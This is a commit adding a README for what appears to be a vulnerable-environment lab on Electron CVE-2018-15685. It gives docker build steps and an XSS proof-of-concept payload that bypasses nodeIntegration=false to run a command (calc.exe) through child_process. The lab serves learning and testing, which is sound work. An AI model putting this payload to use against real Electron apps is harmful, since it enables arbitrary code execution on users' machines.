first commit

electron/CVE-2018-15685/README.md

@@ -0,0 +1,50 @@
+# Electron WebPreferences Remote Code Execution Vulnerability（CVE-2018-15685）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Electron is an open source library developed by GitHub for building cross-platform desktop applications with HTML, CSS, and JavaScript. Electron accomplishes this by combining Chromium and Node.js into a single runtime and apps can be packaged for Mac, Windows, and Linux.
+
+When Electron sets `nodeIntegration=false` (default), the JavaScript in the page cannot access the built-in library of node.js. CVE-2018-15685 bypass this limitation, enabling arbitrary commands to be executed if the user can execute JavaScript (such as when accessing a third-party page or an XSS vulnerability exists in the app).
+
+Reference links:
+
+- https://electronjs.org/blog/web-preferences-fix
+- https://www.contrastsecurity.com/security-influencers/cve-2018-15685
+
+## Compile application
+
+Execute the following command to compile an  vulnerability application:
+
+```
+docker compose run -e PLATFORM=win64 --rm electron
+```
+
+The value of `PLATFORM` is the operating system on which the application is running. The options are:`win64`、`win32`、`mac`、`linux`。
+
+After the compilation completed, execute the following command to run the web service:
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+Now，access`http://your-ip:8080/cve-2018-15685.tar.gz`to download application.
+
+## expliot
+
+Open the app:
+
+![](1.png)
+
+Click submit, the content in the input box will be displayed in the app, and there is obviously an XSS vulnerability.
+
+We submit `<img src=1 onerror="require('child_process').exec('calc.exe')">` and find that nothing happens, because `nodeIntegration=false`.
+
+At this time, submit the POC (Windows):
+
+```
+<img src=1 onerror="window.open().open('data:text/html,<script>require(\'child_process\').exec(\'calc.exe\')</script>');">
+```
+
+As you see, calc.exe shows up.
+
+![](2.png)